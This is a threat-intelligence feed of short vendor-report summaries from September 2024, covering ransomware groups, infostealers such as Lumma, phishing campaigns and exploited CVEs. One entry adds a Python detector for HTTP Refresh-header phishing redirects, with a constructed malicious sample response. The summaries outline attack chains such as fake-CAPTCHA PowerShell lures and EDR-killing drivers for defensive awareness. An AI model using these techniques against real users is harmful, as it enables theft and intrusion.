SentinelOne researchers have identified a new tool called Kryptina, a free and open-source ransomware platform that is used in enterprise attacks, particularly by affiliates of the Mallox ransomware family. Mallox ransomware has been active since 2021 and is also known as FARGO, XOLLAM or BOZON. The ransomware group adopted and modified Kryptina's code to create a new Linux version of this ransomware. The adoption of Kryptina by the Mallox affiliate shows the growing trend of ransomware commoditization, in which cyber criminals use and modify shared code to create new variants.
Source: https://www.sentinelone.com/labs/kryptina-raas-from-unsellable-cast-off-to-enterprise-ransomware/
2024-09-23
Key_Signs_of_Akira_Ransomware
LOW
+
Intel Source:
Huntress
Intel Name:
Key_Signs_of_Akira_Ransomware
Date of Scan:
2024-09-23
Impact:
LOW
Summary:
Researchers from Huntress have observed the important indicators leading up to Akira ransomware attacks, such as the development of new user accounts through lateral movement or vulnerable MSSQL servers. Compromised accounts are sometimes used to get access to endpoints, whether or not RDP is enabled. Limited visibility in events is frequently caused by incomplete Huntress agent deployment or out-of-date Windows systems, affecting detection attempts.
Source: https://www.huntress.com/blog/akira-ransomware-indicators
2024-09-23
Twelve_Group_Tactics_Revealed_in_Attack
LOW
+
Intel Source:
Securelist
Intel Name:
Twelve_Group_Tactics_Revealed_in_Attack
Date of Scan:
2024-09-23
Impact:
LOW
Summary:
Researchers from Securelist have discovered that in spring 2024, the TWELVE group shared personal data on a Telegram channel, which was subsequently closed for violating the platform's terms. Following several months of dormancy, a June 2024 attack used identical techniques and command-and-control servers linked to the gang. The researchers believe the gang is still functioning and will resurface. The attackers' actions are examined utilizing the Unified Kill Chain technique.
Source: https://securelist.com/twelve-group-unified-kill-chain/113877/
2024-09-20
Go_Injector_Leading_to_Stealers
LOW
+
Intel Source:
Esentire
Intel Name:
Go_Injector_Leading_to_Stealers
Date of Scan:
2024-09-20
Impact:
LOW
Summary:
eSentire researchers have uncovered a malware attack involving Lumma Stealer, which steals sensitive information such as cryptocurrency wallets and two-factor authentication data. The attack begins when a user visits a fake website and is tricked into running a PowerShell command disguised as a captcha verification step. This command downloads a zip file containing legitimate-looking files along with a malware injector called Go Injector. The injector secretly inserts Lumma Stealer into a new process and initiates the attack by decrypting the stolen data and sending it to the attacker's servers.
Source: https://www.esentire.com/blog/go-injector-leading-to-stealers
2024-09-20
Malicious_Website_Impersonates_GitHub_Security
MEDIUM
+
Intel Source:
ISC.SANS
Intel Name:
Malicious_Website_Impersonates_GitHub_Security
Date of Scan:
2024-09-20
Impact:
MEDIUM
Summary:
Source: https://isc.sans.edu/diary/Fake%20GitHub%20Site%20Targeting%20Developers/31282
2024-09-20
EDRKillShifter_Disable_EDR_and_Antivirus
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
EDRKillShifter_Disable_EDR_and_Antivirus
Date of Scan:
2024-09-20
Impact:
MEDIUM
Summary:
Trend Micro researchers have identified a new tool integrated by RansomHub group called EDRKillShifter. This tool has capabilities to exploit vulnerabilities in legitimate system drivers to disable antivirus and EDR. It enables attackers to remain active in the system even after bypassing initial security defenses. The process begins when an attacker runs EDRKillShifter with a password. Once the correct password is entered, the tool decrypts and executes a file which then unpacks the final payload containing a vulnerable driver. The driver is then exploited to gain high-level privileges, allowing the attacker to disable EDR tools.
Source: https://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html
2024-09-20
Ransomware_Attack_Triggers_Endpoint_Alerts
LOW
+
Intel Source:
Huntress
Intel Name:
Ransomware_Attack_Triggers_Endpoint_Alerts
Date of Scan:
2024-09-20
Impact:
LOW
Summary:
Researchers from Huntress have discovered a cyberattack in September 2024 in which an endpoint displayed indicators of enabling remote desktop access, preventing system recovery, and running ransomware. Within 20 minutes, the endpoint's files had been encrypted, suggesting a successful ransomware distribution.
Source: https://www.huntress.com/blog/readtext34-ransomware-incident
2024-09-20
Splinter_Emerging_Post_Exploitation_Tool
LOW
+
Intel Source:
Palo Alto
Intel Name:
Splinter_Emerging_Post_Exploitation_Tool
Date of Scan:
2024-09-20
Impact:
LOW
Summary:
Researchers at Palo Alto have found Splinter, a new post-exploitation red team tool, while scanning memory with their Advanced WildFire tools. Although penetration testing frameworks like Splinter can improve security by identifying flaws, they can also be used by malicious actors.
Source: https://unit42.paloaltonetworks.com/analysis-pentest-tool-splinter/
2024-09-19
Earth_Baxia_Exploits_CVE_2024_36401
LOW
+
Intel Source:
Trend Micro
Intel Name:
Earth_Baxia_Exploits_CVE_2024_36401
Date of Scan:
2024-09-19
Impact:
LOW
Summary:
Researchers from Trend Micro have discovered that Earth Baxia, a threat actor group likely based in China, has been spear-phishing government agencies in Taiwan and probably other APAC nations and leveraging the GeoServer vulnerability CVE-2024-36401. This vulnerability, a remote code execution flaw, enabled attackers to download and install malicious components.
Source: https://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html
2024-09-19
Lumma_Stealer_Exploits_Fake_CAPTCHA_Pages
LOW
+
Intel Source:
Cloudsek
Intel Name:
Lumma_Stealer_Exploits_Fake_CAPTCHA_Pages
Date of Scan:
2024-09-19
Impact:
LOW
Summary:
Cloudsek researchers have identified a new method of distributing Lumma Stealer that targets Windows users through fake human verification pages. The technique tricks users into running malicious code via a fake Google CAPTCHA page. When users click Verify, they are instructed to paste a command into the Run dialog box, which executes a hidden PowerShell script that downloads the Lumma Stealer malware. Once the malware is installed, it connects to attacker-controlled domains to steal sensitive information.
Source: https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages
2024-09-19
Fake_GitHub_Security_Alert_Spreads_Lumma_Stealer
LOW
+
Intel Source:
CERT-AGID
Intel Name:
Fake_GitHub_Security_Alert_Spreads_Lumma_Stealer
Date of Scan:
2024-09-19
Impact:
LOW
Summary:
Researchers at CERT AGID have identified a phishing attack targeting GitHub users with a fake security warning titled “IMPORTANT! Security Vulnerability Detected in your Repository (Issue #1).” The email pretends to be from the GitHub Security Team and redirects users to a malicious website github-scanner[.]com. The site instructs them to press specific keys (Windows+R, Ctrl+V, Enter) that run malicious PowerShell code. This code installs Lumma Stealer malware which steals sensitive information like login credentials. If the malware can't connect to its C2 servers, it attempts to gather data from Steam profiles.
Source: https://cert-agid.gov.it/news/lumma-stealer-diffuso-tramite-notifica-di-falsa-vulnerabilita-di-sicurezza-sul-proprio-progetto-github/
2024-09-19
Poseidon_Stealer_Target_MacOS_through_Sopha_AI
LOW
+
Intel Source:
Esentire
Intel Name:
Poseidon_Stealer_Target_MacOS_through_Sopha_AI
Date of Scan:
2024-09-19
Impact:
LOW
Summary:
eSentire researchers have discovered a malware called Poseidon Stealer that specifically targets macOS devices. The malware spreads through a fake Sora AI installer downloaded from a malicious website via Google Ads. It uses various techniques to conceal its activity, such as running in the background even after the terminal window is closed. It gathers sensitive information including browser data, cryptocurrency wallets, Keychain details and documents. The malware also deceives users by displaying a fake system prompt to steal their macOS password. Poseidon Stealer transfers the stolen data to a C2 server using a curl command to avoid detection.
Source: https://www.esentire.com/blog/poseidon-stealer-uses-sopha-ai-lure-to-infect-macos
2024-09-19
UNC1860_Target_Middle_East
MEDIUM
+
Intel Source:
Mandiant
Intel Name:
UNC1860_Target_Middle_East
Date of Scan:
2024-09-19
Impact:
MEDIUM
Summary:
Mandiant researchers have identified UNC1860, an Iranian state-sponsored group linked to Iran's Ministry of Intelligence and Security (MOIS). This group is known for its advanced hacking tools and backdoors which allow them to maintain persistent access to networks particularly in the government and telecommunications sectors across the Middle East. Their toolkit includes custom controllers like TEMPLEPLAY and VIROGREEN which make it easier for external operators to deploy malware and manage infected systems. They possess strong reverse-engineering capabilities to manipulate Windows systems. The group has been observed scanning for vulnerabilities in Saudi Arabia, testing credentials in both Qatar and Saudi Arabia, and targeting VPN servers in the region.
Source: https://cloud.google.com/blog/topics/threat-intelligence/unc1860-iran-middle-eastern-networks/
2024-09-19
PondRAT_Malware_Targets_via_Python_Packages
LOW
+
Intel Source:
Palo Alto
Intel Name:
PondRAT_Malware_Targets_via_Python_Packages
Date of Scan:
2024-09-19
Impact:
LOW
Summary:
Researchers at Palo Alto have identified a malicious Python package campaign known as "PondRAT," which delivered backdoors to Linux and macOS. This campaign is attributed to the North Korean Gleaming Pisces APT group, which is uploading poisoned Python packages to the popular PyPI repository. PondRAT, an updated version of the previously known POOLRAT malware, targets developer endpoints in order to infect supply chain vendors and their customers.
Source: https://unit42.paloaltonetworks.com/gleaming-pisces-applejeus-poolrat-and-pondrat/
2024-09-19
Unveiling_Emmenhtal_Malware_Delivery_System
LOW
+
Intel Source:
Sekoia
Intel Name:
Unveiling_Emmenhtal_Malware_Delivery_System
Date of Scan:
2024-09-19
Impact:
LOW
Summary:
Researchers at Sekoia have discovered the infrastructure that supports the Emmenhtal loader, also known as PeakLight, which has been operational since December 2023. This study highlights the loader's use of WebDAV technology to host harmful files and suggests that this infrastructure could be part of a commercial service provided by hackers.
Source: https://blog.sekoia.io/webdav-as-a-service-uncovering-the-infrastructure-behind-emmenhtal-loader-distribution/
2024-09-19
A_Deep_Dive_into_Black_Basta_Ransomware
MEDIUM
+
Intel Source:
Qualys
Intel Name:
A_Deep_Dive_into_Black_Basta_Ransomware
Date of Scan:
2024-09-19
Impact:
MEDIUM
Summary:
Researchers from Qualys have identified a ransomware group called Black Basta that operates as a Ransomware-as-a-Service (RaaS) and was first discovered in April 2022. The group uses a double extortion tactic, demanding payment not only to decrypt files but also to prevent the public release of stolen data. The group has been targeting a wide range of industries, including critical infrastructure, in North America, Europe and Australia. This group gains initial access through phishing, malicious software like Qakbot and Cobalt Strike, or by exploiting vulnerabilities. They exfiltrate sensitive data using tools such as Rclone and WinSCP before deploying the ransomware.
Source: https://blog.qualys.com/vulnerabilities-threat-research/2024/09/19/black-basta-ransomware-what-you-need-to-know#indicators-of-compromise
2024-09-18
SPID_Banking_Phishing_Campaign
LOW
+
Intel Source:
CERT-AGID
Intel Name:
SPID_Banking_Phishing_Campaign
Date of Scan:
2024-09-18
Impact:
LOW
Summary:
Researchers from CERT AGID have uncovered a phishing campaign targeting users of Italian banks by exploiting the SPID (Public Digital Identity System) service which is used for online authentication. The fraudulent website closely mimics the official SPID page to trick users into updating their credentials to renew their digital identity and maintain access to online services. When users click the link, they are asked to select their bank and verify their identity. After choosing their bank they are redirected to a fake login page designed to resemble the bank's official site.
Source: https://cert-agid.gov.it/news/in-atto-una-campagna-di-phishing-bancario-a-tema-spid/
2024-09-18
Threat_Actors_Using_HR_Related_Phishing_Tactics
LOW
+
Intel Source:
Cofense
Intel Name:
Threat_Actors_Using_HR_Related_Phishing_Tactics
Date of Scan:
2024-09-18
Impact:
LOW
Summary:
Cofense researchers have discovered a phishing campaign in which attackers target employees by impersonating their company's HR department. The email appears official, with a subject line such as 'Important: Revised Employee Handbook' to create urgency and prompt employees to act quickly. It uses formal language and includes a link to review the handbook. This link leads to a fake Microsoft page that asks users to enter their company login details. After submission, users receive an error message and are redirected to the real login page, making it seem like a minor glitch. Meanwhile, the attackers have stolen their login credentials for further attacks or to access sensitive company data.
Source: https://cofense.com/blog/threat-actors-continue-to-utilize-hr-related-phishing-tactics
2024-09-18
SuperShell_Malware_Targeting_Linux_SSH_Servers
LOW
+
Intel Source:
ASEC
Intel Name:
SuperShell_Malware_Targeting_Linux_SSH_Servers
Date of Scan:
2024-09-18
Impact:
LOW
Summary:
ASEC researchers have discovered an attack in which the SuperShell backdoor was installed on a poorly managed Linux SSH server. The malware, written in Go by a Chinese-speaking developer, acts as a reverse shell that allows attackers to control infected systems remotely. It supports multiple platforms, including Windows, Linux and Android, and is distributed through both web and FTP servers. In this attack the attacker's objective was to take control of the system and install a Monero cryptocurrency miner such as XMRig.
Source: https://asec.ahnlab.com/ko/83121/
2024-09-18
Gomorrah_Stealer
LOW
+
Intel Source:
Cyfirma
Intel Name:
Gomorrah_Stealer
Date of Scan:
2024-09-18
Impact:
LOW
Summary:
Cyfirma researchers have analyzed Gomorrah Stealer, a .NET-based information stealer sold under a malware-as-a-service (MaaS) model that targets sensitive data on compromised systems. Its primary function is to extract and exfiltrate information such as passwords, credit card details and cookies from web browsers and other applications. Gomorrah Stealer is sold and supported through Telegram. It compresses the stolen data into a ZIP archive, sends it to a C2 server, and then deletes the local copies to cover its tracks. The malware also receives updates and instructions from the C2 server to remain active.
Source: https://www.cyfirma.com/research/gomorrah-stealer-v5-1-an-in-depth-analysis-of-a-net-based-malware/
2024-09-18
The_Raptor_Train_Botnet
MEDIUM
+
Intel Source:
Lumen
Intel Name:
The_Raptor_Train_Botnet
Date of Scan:
2024-09-18
Impact:
MEDIUM
Summary:
Researchers from Black Lotus Labs have uncovered a massive botnet called Raptor Train, believed to be operated by the Chinese threat actor known as Flax Typhoon. The botnet has been active for over four years and has compromised hundreds of thousands of devices such as home routers, security cameras and network storage servers. The operators use a custom-built system called Sparrow to control the network and target U.S. and Taiwanese organizations in sectors such as the military, higher education, telecommunications, government and IT. They have also attempted to exploit Atlassian Confluence servers and Ivanti Connect Secure appliances through the botnet. No DDoS attacks have been observed from Raptor Train yet, but it appears capable of them.
Source: https://blog.lumen.com/derailing-the-raptor-train/
2024-09-18
Evolving_Python_Exploits_by_DPRK_Hackers
LOW
+
Intel Source:
Elastic Security Labs
Intel Name:
Evolving_Python_Exploits_by_DPRK_Hackers
Date of Scan:
2024-09-18
Impact:
LOW
Summary:
Researchers at Elastic Security Labs have documented how DPRK actors use Python in their intrusions. They favor Python because it is easy to obfuscate and has broad library support. The DPRK tradecraft also includes sophisticated social engineering and long-term persona building. The Python scripts observed can run system commands and modify local files, underscoring the need for continuous awareness and adaptation in cyber defense.
Source: https://www.elastic.co/security-labs/dprk-code-of-conduct
2024-09-18
SambaSpy_RAT_Unveiled_in_Italian_Cyberattack
LOW
+
Intel Source:
Securelist
Intel Name:
SambaSpy_RAT_Unveiled_in_Italian_Cyberattack
Date of Scan:
2024-09-18
Impact:
LOW
Summary:
Researchers at Securelist have discovered a campaign in May 2024 that specifically targeted Italian users, which is unusual since most such operations target multiple countries at once. The attackers used a new RAT, SambaSpy, as the final payload, routing the infection chain through a legitimate company's online document service even though that company had no connection to the operation.
Source: https://securelist.com/sambaspy-rat-targets-italian-users/113851/
2024-09-17
North_Korea_Targets_Crypto_with_Social_Scams
LOW
+
Intel Source:
Jamf Threat Labs
Intel Name:
North_Korea_Targets_Crypto_with_Social_Scams
Date of Scan:
2024-09-17
Impact:
LOW
Summary:
Researchers from Jamf Threat Labs have observed targeted attacks consistent with earlier FBI warnings about North Korean cyber operations. These attacks typically begin on social media, for example with someone posing as a recruiter on LinkedIn. On September 3, 2024, the FBI warned that North Korea was using social engineering against individuals in the cryptocurrency industry with the goal of delivering malware.
Source: https://www.jamf.com/blog/jamf-threat-labs-observes-targeted-attacks-amid-fbi-warnings/
2024-09-17
Vidar_Malware_Spread_Through_PEC_Mailbox_Attack
LOW
+
Intel Source:
CERT-AGID
Intel Name:
Vidar_Malware_Spread_Through_PEC_Mailbox_Attack
Date of Scan:
2024-09-17
Impact:
LOW
Summary:
Researchers from CERT-AGID have discovered a new malspam campaign targeting PEC (certified email) mailboxes, first reported on September 16, 2024. Initially the emails linked to an Italian domain (Excite) that carried no malicious payload. The attackers then changed tactics, reusing the identical text but swapping the link for an active domain that drops a JavaScript file. This file ultimately installs the Vidar malware, which is known for its information-stealing capabilities.
Source: https://cert-agid.gov.it/news/vidar-compare-ancora-in-una-nuova-campagna-malspam-che-sfrutta-le-caselle-pec/
2024-09-17
UNC2970_Backdoor
MEDIUM
+
Intel Source:
Mandiant
Intel Name:
UNC2970_Backdoor
Date of Scan:
2024-09-17
Impact:
MEDIUM
Summary:
Mandiant identified UNC2970, a cyber espionage group linked to North Korea, using a multi-stage delivery chain to deploy malware. UNC2970 targets individuals in U.S. critical infrastructure sectors through job-themed phishing, posing as recruiters for prominent companies. The group sends a password-protected ZIP archive containing an encrypted PDF and a trojanized copy of the SumatraPDF reader; the open-source SumatraPDF project itself is not compromised, the group simply ships an altered copy. This modified viewer launches the MISTPEN backdoor via the BURNBOOK launcher. Mandiant noted that UNC2970 tailors the job descriptions to each victim's profile, aiming to extract sensitive information from senior employees.
Source: https://cloud.google.com/blog/topics/threat-intelligence/unc2970-backdoor-trojanized-pdf-reader/
2024-09-17
Marko_Polo_ThreatActor
MEDIUM
+
Intel Source:
RecordedFuture
Intel Name:
Marko_Polo_ThreatActor
Date of Scan:
2024-09-17
Impact:
MEDIUM
Summary:
The "Marko Polo" cybercrime group represents a growing global threat with a sophisticated network of scams using infostealer malware. Targeting both individuals and businesses worldwide, Marko Polo deploys over 30 distinct scams by impersonating popular brands in online gaming, virtual meetings, and cryptocurrency platforms. They utilize advanced social engineering and spearphishing tactics, specifically targeting high-profile cryptocurrency influencers and online personalities. Their malware arsenal, including HijackLoader, Stealc, and AMOS, demonstrates their ability to adapt and scale operations across various platforms, affecting tens of thousands of devices globally and generating millions in illicit revenue.
Source: https://www.recordedfuture.com/research/marko-polo-navigates-uncharted-waters-with-infostealer-empire
2024-09-17
Snake_Keylogger_Activity
MEDIUM
+
Intel Source:
Unit42
Intel Name:
Snake_Keylogger_Activity
Date of Scan:
2024-09-17
Impact:
MEDIUM
Summary:
Unit 42 researchers identified a new Snake KeyLogger campaign (the malware is also known as "VIP KeyLogger") distributed via email. The infection begins with a phishing email themed "NEW PO-09162024" that carries a compressed archive attachment. When the victim extracts and runs the executable inside, it installs Snake KeyLogger, a .NET-based keylogger targeting Windows systems. The malware exfiltrates login credentials and cookie data from web browsers and Microsoft Outlook. The associated malicious files are a .gz archive and a .NET executable, and the malware exfiltrates data over email, communicating through various ports.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-09-16-IOCs-for-Snake-KeyLogger.txt
2024-09-16
Malware_Targeting_US_Taiwan_Defense_Industry
LOW
+
Intel Source:
Cyble
Intel Name:
Malware_Targeting_US_Taiwan_Defense_Industry
Date of Scan:
2024-09-16
Impact:
LOW
Summary:
Cyble researchers have discovered a campaign targeting people interested in the upcoming US-Taiwan Defense Industry Conference. The attacker distributes a ZIP file containing a Windows shortcut (LNK) disguised as a legitimate PDF registration form. When the shortcut is opened it runs commands that drop a decoy PDF and the malicious payload into the Startup folder, giving the attacker persistence on the system.
Source: https://cyble.com/blog/stealthy-fileless-attack-targets-attendees-of-us-taiwan-defense-industry-event/
2024-09-16
Phishing_Campaigns_Targeting_Financial_Sector
LOW
+
Intel Source:
Palo Alto
Intel Name:
Phishing_Campaigns_Targeting_Financial_Sector
Date of Scan:
2024-09-16
Impact:
LOW
Summary:
Palo Alto Networks researchers have discovered large-scale phishing campaigns in 2024 that use the HTTP Refresh response header to redirect victims to malicious pages automatically. Because the Refresh header instructs the browser to navigate to another URL on its own, without any link click or script, the initially visited URL can look harmless while the victim is silently sent on to the phishing page. Between May and July, more than 2,000 malicious URLs of this kind were observed daily. The campaigns primarily targeted the global financial sector, government websites and major internet platforms.
Source: https://unit42.paloaltonetworks.com/rare-phishing-page-delivery-header-refresh/
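The redirect mechanism described above can be spotted at a proxy or in captured traffic by inspecting response headers. The following detector is an added example written for this entry, not code from Unit 42 or from the report; it parses raw HTTP responses, pulls the Refresh header apart, and flags responses that bounce the client to a different domain immediately or carry what looks like a recipient's e-mail address in the target URL (a heuristic chosen for the example, not a finding taken from the report). The sample responses are constructed for the example.

```python
import re
from urllib.parse import unquote, urlparse

# "Refresh: <seconds>; url=<target>" -- the URL part may be quoted and the
# "url=" prefix is optional in some browsers, so both forms are accepted.
REFRESH_RE = re.compile(
    r"^\s*(\d+)\s*(?:;|,)\s*(?:url\s*=\s*)?['\"]?([^'\"\s]+)", re.IGNORECASE
)
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def parse_response_headers(raw: bytes) -> dict:
    """Return lower-cased header name -> value for a raw HTTP response; the body is ignored."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = {}
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def parse_refresh(value: str):
    """Split a Refresh header into (delay_seconds, target_url); None if it is not a redirect."""
    match = REFRESH_RE.match(value)
    if not match:
        return None
    return int(match.group(1)), match.group(2)


def analyze_response(raw: bytes, requested_url: str) -> dict:
    """Describe a header-based redirect, if any, and rate how phishing-like it is."""
    headers = parse_response_headers(raw)
    parsed = parse_refresh(headers.get("refresh", ""))
    if parsed is None:
        return {"redirect": False, "suspicious": False}
    delay, target = parsed
    src_host = (urlparse(requested_url).hostname or "").lower()
    dst_host = (urlparse(target).hostname or src_host).lower()   # relative URL stays on the same host
    cross_domain = dst_host != src_host
    has_email = EMAIL_RE.search(unquote(target)) is not None      # victim address pre-filled in the URL
    return {
        "redirect": True,
        "delay": delay,
        "target": target,
        "cross_domain": cross_domain,
        "has_email": has_email,
        # Heuristic: an immediate hop to another domain, or one that carries a
        # recipient address, is how the abuse described above presents itself.
        "suspicious": cross_domain and (delay == 0 or has_email),
    }


# Constructed sample responses (not captures from the campaign).
MALICIOUS_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Refresh: 0; url=https://secure-login-verify.example.net/?e=victim%40corp.example\r\n"
    b"\r\n"
    b"<html><body>Loading...</body></html>"
)
BENIGN_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Refresh: 30\r\n"                        # plain page auto-reload, no URL
    b"\r\n"
    b"<html><body>Dashboard</body></html>"
)

if __name__ == "__main__":
    print(analyze_response(MALICIOUS_RESPONSE, "https://cdn-files.example.com/doc.html"))
    print(analyze_response(BENIGN_RESPONSE, "https://intranet.example.com/status"))
```

A plain `Refresh: 30` with no URL is a page reload, not a redirect, so it is not reported; a relative target stays on the requesting host and is likewise left alone. Only a hop to another domain, taken immediately or with a pre-filled address, is scored as suspicious.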
2024-09-13
PartnerLeak_Scam_Exploits_Trust_to_Steal_Data
LOW
+
Intel Source:
Malwarebytes
Intel Name:
PartnerLeak_Scam_Exploits_Trust_to_Steal_Data
Date of Scan:
2024-09-13
Impact:
LOW
Summary:
Researchers at Malwarebytes have discovered a scam in which recipients are led to believe their partner is cheating. The email claims to have stolen sensitive information such as contacts and browsing history and offers "proof" via a website link. The site, partnerleak[.]com, was registered anonymously on August 1, 2024. When recipients visit it, their email address is already filled in, indicating it was supplied by the link they clicked.
Source: https://www.malwarebytes.com/blog/news/2024/09/partnerleak-scam-site-promises-victims-full-access-to-cheating-partners-stolen-data
2024-09-13
A_Growing_Cyber_Threat_of_Medusa_Ransomware
MEDIUM
+
Intel Source:
Bitdefender
Intel Name:
A_Growing_Cyber_Threat_of_Medusa_Ransomware
Date of Scan:
2024-09-13
Impact:
MEDIUM
Summary:
Bitdefender researchers have analyzed Medusa ransomware in depth and highlighted the growing threat it poses. Medusa is a prominent ransomware group that surfaced in 2023 and stands out for its visible presence on both the surface web and the dark web. In 2024 it has kept up a high tempo of attacks, frequently publicizing leaks and ransom demands on a victim-shaming blog, X and Telegram.
Source: https://www.bitdefender.com/blog/businessinsights/medusa-ransomware-a-growing-threat-with-a-bold-online-presence/
2024-09-13
Misuse_of_Selenium_Grid
LOW
+
Intel Source:
Cado Security
Intel Name:
Misuse_of_Selenium_Grid
Date of Scan:
2024-09-13
Impact:
LOW
Summary:
Cado Security researchers have identified increasing misuse of Selenium Grid for malicious activity such as cryptomining and proxyjacking. Selenium Grid, a tool designed to distribute automated web application tests across many machines, is being abused by threat actors to harness the computing power of those distributed systems for unauthorized cryptomining. It is also used to route traffic through compromised systems, effectively turning them into proxies for various criminal purposes.
Source: https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking
2024-09-13
Weblogic_Servers_Hit_by_Hadooken_Cryptominer
MEDIUM
+
Intel Source:
Aqua Sec
Intel Name:
Weblogic_Servers_Hit_by_Hadooken_Cryptominer
Date of Scan:
2024-09-13
Impact:
MEDIUM
Summary:
Researchers from Aqua have discovered new Linux malware that targets WebLogic servers. When executed, the malware, dubbed "Hadooken" (possibly a nod to Street Fighter's "surge fist" move), installs the Tsunami malware and then launches a cryptominer.
Source: https://www.aquasec.com/blog/hadooken-malware-targets-weblogic-applications/
2024-09-13
Critical_Apache_OFBiz_Vulnerability_Exploiting
MEDIUM
+
Intel Source:
Cyble
Intel Name:
Critical_Apache_OFBiz_Vulnerability_Exploiting
Date of Scan:
2024-09-13
Impact:
MEDIUM
Summary:
Researchers at Cyble observed active exploitation of CVE-2024-32113, a critical path traversal vulnerability in Apache OFBiz, on September 7, 2024. The flaw, which allows unauthorized command execution, was initially patched on May 8, 2024. However, on September 4, 2024, a bypass of that fix (tracked as CVE-2024-45195) emerged, reigniting interest and driving up exploitation. Attackers are using the exploit to compromise systems and deploy the Mirai botnet.
Source: https://cyble.com/blog/the-re-emergence-of-cve-2024-32113-how-cve-2024-45195-has-amplified-exploitation-risks/
2024-09-13
Safeguarding_Retail_Campaigns_from_Online_Fraud
LOW
+
Intel Source:
DomainTools
Intel Name:
Safeguarding_Retail_Campaigns_from_Online_Fraud
Date of Scan:
2024-09-13
Impact:
LOW
Summary:
Researchers from DomainTools have analyzed the growing issue of domain fraud in retail-targeted campaigns. It highlights how brand impersonation and Ponzi schemes are increasingly leveraging fraudulent domains to deceive consumers and undermine legitimate businesses. They observed the tactics used by fraudsters, including creating fake websites that mimic reputable brands, and the negative impact these schemes can have on both consumers and companies.
Source: https://www.domaintools.com/resources/blog/retail-targeted-campaigns-domain-fraud-brand-impersonation-and-ponzi-schemes/
2024-09-12
Critical_RCE_Flaw_in_WhatsUp_Gold_Network_Software
LOW
+
Intel Source:
Trend Micro
Intel Name:
Critical_RCE_Flaw_in_WhatsUp_Gold_Network_Software
Date of Scan:
2024-09-12
Impact:
LOW
Summary:
Researchers at Trend Micro have observed remote code execution attacks against WhatsUp Gold since August 30 that abuse the product's Active Monitor PowerShell Script feature. The attacks likely exploit CVE-2024-6670 and CVE-2024-6671, which were patched on August 16; exploitation appears to have begun on August 30, shortly after a proof of concept was published that day.
Source: https://www.trendmicro.com/en_us/research/24/i/whatsup-gold-rce.html
2024-09-12
DragonRank_Attack_Using_PlugX_and_BadIIS_Malware
LOW
+
Intel Source:
Cisco Talos
Intel Name:
DragonRank_Attack_Using_PlugX_and_BadIIS_Malware
Date of Scan:
2024-09-12
Impact:
LOW
Summary:
Researchers from Cisco Talos have found a new threat actor, "DragonRank", that compromises web application servers, mainly in Asia and Europe, to manipulate search engine optimization (SEO) rankings. DragonRank deploys a web shell to gather system information and launch malware such as PlugX and BadIIS, alongside credential-harvesting tools. To evade detection, PlugX relies on DLL sideloading and abuses Windows Structured Exception Handling (SEH).
Source: https://blog.talosintelligence.com/dragon-rank-seo-poisoning/
2024-09-12
SCATTERED_SPIDER_Targets_Cloud_with_Ransomware
LOW
+
Intel Source:
EclecticIQ
Intel Name:
SCATTERED_SPIDER_Targets_Cloud_with_Ransomware
Date of Scan:
2024-09-12
Impact:
LOW
Summary:
Researchers from EclecticIQ report that the SCATTERED SPIDER gang targets cloud infrastructure in the insurance and banking sectors using social engineering such as vishing and smishing. The group uses stolen credentials, SIM swaps and cloud-native tooling to gain persistent access while making attribution and detection difficult. Its familiarity with Western business practices, together with its affiliation with the BlackCat/ALPHV ransomware operation, has increased its effectiveness.
Source: https://blog.eclecticiq.com/ransomware-in-the-cloud-scattered-spider-targeting-insurance-and-financial-industries
2024-09-11
Uncovering_The_Unique_YASS_Infostealer
LOW
+
Intel Source:
Intezer
Intel Name:
Uncovering_The_Unique_YASS_Infostealer
Date of Scan:
2024-09-11
Impact:
LOW
Summary:
Intezer researchers recently identified a new infostealer while examining a suspicious file. Although it closely resembles the known CryptBot malware, this sample differed enough to be classified as a distinct threat, which they named "Yet Another Silly Stealer" (YASS). The malware was distributed by a multi-stage downloader known as MustardSandwich.
Source: https://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/
2024-09-11
Sekoia_Hunts_Malicious_Domains_for_Paris_Olympics
LOW
+
Intel Source:
Sekoia
Intel Name:
Sekoia_Hunts_Malicious_Domains_for_Paris_Olympics
Date of Scan:
2024-09-11
Impact:
LOW
Summary:
Researchers at Sekoia have discovered numerous fake domains that mimicked the official Paris 2024 Olympics websites in July and August 2024. Cybercriminals registered these typosquatted domains to carry out phishing and other fraud. Earlier, in January 2024, Sekoia had noted that major events such as the Olympics are prime targets for online scams, including fake ticket sales and phishing.
Source: https://blog.sekoia.io/securing-gold-hunting-typosquatted-domains-during-the-olympics/
2024-09-11
Typosquatting_and_Brand_Impersonation_in_Phishing
LOW
+
Intel Source:
Zscaler
Intel Name:
Typosquatting_and_Brand_Impersonation_in_Phishing
Date of Scan:
2024-09-11
Impact:
LOW
Summary:
Researchers from Zscaler have found that phishing campaigns in 2024 relied heavily on typosquatting and brand impersonation. Between February and July they examined more than 30,000 lookalike domains and identified 10,000 of them as malicious. Google, Microsoft and Amazon were the most frequently impersonated brands, with roughly 75% of the phishing sites copying these three companies. Almost half of the malicious domains used Let's Encrypt TLS certificates to appear trustworthy, and .com was the most commonly abused top-level domain among domains aimed at English speakers.
Source: https://www.zscaler.com/blogs/security-research/phishing-typosquatting-and-brand-impersonation-trends-and-tactics
